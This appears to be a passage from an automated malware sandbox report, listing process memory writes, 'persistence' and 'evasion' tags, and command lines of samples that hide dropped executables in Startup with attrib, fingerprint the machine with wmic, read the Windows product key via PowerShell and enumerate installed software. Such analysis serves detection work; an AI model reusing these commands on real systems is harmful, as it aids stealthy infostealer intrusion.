PID 4424 wrote to memory of 3116 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4424 wrote to memory of 3116 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4424 wrote to memory of 3116 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4424 wrote to memory of 3116 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4424 wrote to memory of 3116 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4424 wrote to memory of 3116 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4424 wrote to memory of 3116 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 4792 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 4792 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3116 wrote to memory of 2692 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Net amp.exe

"C:\Users\Admin\AppData\Local\Temp\Net amp.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE

C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe

"C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +r +s "C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.0.1637227468\15622854" -parentBuildID 20221007134813 -prefsHandle 1872 -prefMapHandle 1864 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec097978-0372-4dde-943f-9f702f63ea74} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 1964 1c979bb8b58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.1.141293909\2018825467" -parentBuildID 20221007134813 -prefsHandle 2336 -prefMapHandle 2332 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54399ab9-9707-4f5a-84c8-a787278289aa} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 2364 1c96d26f558 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.2.2012089274\550300600" -childID 1 -isForBrowser -prefsHandle 3296 -prefMapHandle 3292 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0db47547-0343-4e78-bc02-c3fe5bfb9319} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 3128 1c97dcf3a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.3.319130038\1464540965" -childID 2 -isForBrowser -prefsHandle 3616 -prefMapHandle 3612 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c34f843-6aff-4b93-8a4d-d53042dde3f3} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 2960 1c96d268758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.4.1179311708\86572469" -childID 3 -isForBrowser -prefsHandle 4152 -prefMapHandle 4148 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ee96add-127b-4737-b25b-cc008d14616c} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 4164 1c97eab4058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.6.119416380\739274067" -childID 5 -isForBrowser -prefsHandle 5204 -prefMapHandle 5208 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5abf1e20-82a9-49f4-bdde-8acf09bae6c3} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 5196 1c97dc64458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.7.820436086\192254592" -childID 6 -isForBrowser -prefsHandle 5392 -prefMapHandle 5396 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0461d9f-6721-4833-9fc6-b1ce49c4889e} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 5384 1c97dc66258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.5.965980751\1263529297" -childID 4 -isForBrowser -prefsHandle 5052 -prefMapHandle 4756 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {86d38c95-44c1-4df3-b493-b600e86ba292} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 5064 1c97dc65c58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.8.737089822\897069053" -childID 7 -isForBrowser -prefsHandle 6108 -prefMapHandle 6112 -prefsLen 29615 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7202710c-ac8f-49b3-bfc1-95a715aa0153} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 3268 1c980f44d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.9.615788110\10310631" -childID 8 -isForBrowser -prefsHandle 5248 -prefMapHandle 5660 -prefsLen 29615 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a80b5eb-4579-44cb-9e75-a1b445edbb51} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 5164 1c987376558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.10.91352381\354763682" -childID 9 -isForBrowser -prefsHandle 10072 -prefMapHandle 10076 -prefsLen 29615 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7e7bde7-1158-489b-9c78-df8e99fd841c} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 10064 1c985c0c258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.12.259442315\1847805680" -childID 11 -isForBrowser -prefsHandle 9744 -prefMapHandle 9748 -prefsLen 29694 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e8a12aa-f933-4152-80e5-891a9f744909} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 9736 1c982d11e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.11.853087454\368670465" -childID 10 -isForBrowser -prefsHandle 9956 -prefMapHandle 9960 -prefsLen 29694 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20cb32c6-603e-4f03-9986-6541ced0ac74} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 9948 1c982d12458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.13.220623817\2028457902" -childID 12 -isForBrowser -prefsHandle 5464 -prefMapHandle 4352 -prefsLen 29694 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4e54f73-a734-4cdd-9d06-99d89dfa9117} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 5064 1c9860fce58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.14.1990400373\250972225" -childID 13 -isForBrowser -prefsHandle 5280 -prefMapHandle 5184 -prefsLen 29734 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {41695172-e908-4538-894c-dcd5f7243027} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 5364 1c987978158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.15.537475600\1555614447" -childID 14 -isForBrowser -prefsHandle 9280 -prefMapHandle 5184 -prefsLen 29734 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b382a3bf-645d-47b9-9da4-aba9ef2c0c31} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 5180 1c98117a158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.16.438015319\417930917" -childID 15 -isForBrowser -prefsHandle 9044 -prefMapHandle 9040 -prefsLen 29734 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1453aec6-0446-4e26-aacf-d2cee264a588} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 9200 1c98117a458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.17.262481326\1567154431" -parentBuildID 20221007134813 -prefsHandle 9044 -prefMapHandle 5188 -prefsLen 29734 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6626a09-1d34-4dd1-b777-8a12492f475d} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 8964 1c987b2b858 rdd

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.18.823127594\1161384795" -childID 16 -isForBrowser -prefsHandle 9908 -prefMapHandle 6148 -prefsLen 29734 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b101d74-3176-462d-b39c-caa0e50e85f7} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 9920 1c984f44558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.19.296941858\11372967" -childID 17 -isForBrowser -prefsHandle 8776 -prefMapHandle 8772 -prefsLen 29734 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8630c467-3424-46d9-9718-014d1f877285} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 9652 1c97dc65358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.20.1452272974\1740447945" -childID 18 -isForBrowser -prefsHandle 1664 -prefMapHandle 5700 -prefsLen 29743 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95433ffb-8067-43a3-9f5b-a0cd4777e605} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 9676 1c982c53f58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.21.2061506001\2108231716" -childID 19 -isForBrowser -prefsHandle 9440 -prefMapHandle 9416 -prefsLen 29743 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f1c9928-8945-4010-bb7f-f7a45e647c65} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 2840 1c982c54e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.22.520686563\1083276776" -childID 20 -isForBrowser -prefsHandle 8384 -prefMapHandle 8380 -prefsLen 29743 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {815124fa-1ba1-44e9-8298-578585269446} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 8392 1c9837ab558 tab

C:\Users\Admin\Downloads\processhacker-2.39-setup.exe

"C:\Users\Admin\Downloads\processhacker-2.39-setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp" /SL5="$20692,1874675,150016,C:\Users\Admin\Downloads\processhacker-2.39-setup.exe"

C:\Program Files\Process Hacker 2\ProcessHacker.exe

"C:\Program Files\Process Hacker 2\ProcessHacker.exe"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\Creative EAX Settings.exe

"C:\Users\Admin\Downloads\Creative EAX Settings.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1560 --field-trial-handle=1772,5064392763959393394,8550773419608691522,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1976 --field-trial-handle=1772,5064392763959393394,8550773419608691522,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=NaN get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=NaN get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""

C:\Windows\system32\reg.exe

